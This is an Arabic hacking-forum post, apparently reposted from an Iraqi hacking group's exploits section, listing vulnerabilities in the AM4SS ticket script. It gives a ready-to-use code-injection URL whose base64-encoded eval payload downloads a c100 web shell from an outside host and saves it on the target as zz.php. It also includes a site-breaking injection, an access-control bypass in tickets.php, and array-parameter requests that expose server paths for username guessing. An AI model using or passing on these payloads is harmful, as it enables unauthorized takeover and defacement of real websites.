الوسوم:
حالة الموضوع:
مغلق
  1. .:: RSS ::.

    .:: RSS ::. عضوية آلية

    الأنتساب:
    ‏9 سبتمبر 2011
    المشاركات:
    14,005
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    36
    الإقامة:
    IQ-T34M
    بسم الله الرحمن الرحيم

    السلام عليكم

    فحصت سكربت
    AM4SS

    لقيت كم ثغرة ماهي خطيره وحبيت بالمره احط باقي ثغرات السكربت في الموضوع


    طبعا كان الثغرة الاولى من اكتشاف اورنج مان
    وهي بالشكل التالي



    كود:
    www.ddd.com/global.php?bn=

    الاستغلال هتضيف هالكود بعد =


    كود:
    eval(base64_decode(JGZpbGUgPSBmb3BlbigienoucGhwIiAsIncrIik7JHNhPWZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vd3d3LnNoM2xsLm9yZy9jMTAwLnR4dCIpOyR3cml0ZSA9IGZ3cml0ZSAoJGZpbGUgLCRzYSk7)

    وبتلقى شل بهالاسم zz.php


    الثغرة الثانيه نفس النوع بس انها تعطب الموقع



    كود:
    www.gg.com//admincp/global.php?Checker=youStop();

    واظن ان هالثغرتين من نفس المبرمج اضافها



    وثغرة اكسس بهالمكان طبعا الاستفاده منها يتطلب صفحة html



    كود:
    tickets.php?do=add&step=2

    [​IMG]


    االحين اخطاء تتسسب باظهار مسار الموقع بيفيدني في استخراج اليوزر
    والتخمين

    تدخل ع هالمسار
    login.php
    وبعدها تضغط دخول وتشغل الاداءة مثل الصوره

    [​IMG]



    كود:
    password[]=1&useremail=sample%40w3afl.tst

    وبعد
    /



    كود:
    tickets.php?do=add&step=2




    بنفس الطريقة الا قبلها


    كود:
    message=20&subject=1&sdfdsffggrgrt=3&useremail[]=1&userfullname=aamaqwdsa




    المصدر: شبكة عراق تيم IQ-T34M - من قسم: [ ثــغـرات الأعــضــاء]

    eyvhj s;vfj am4ss​
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة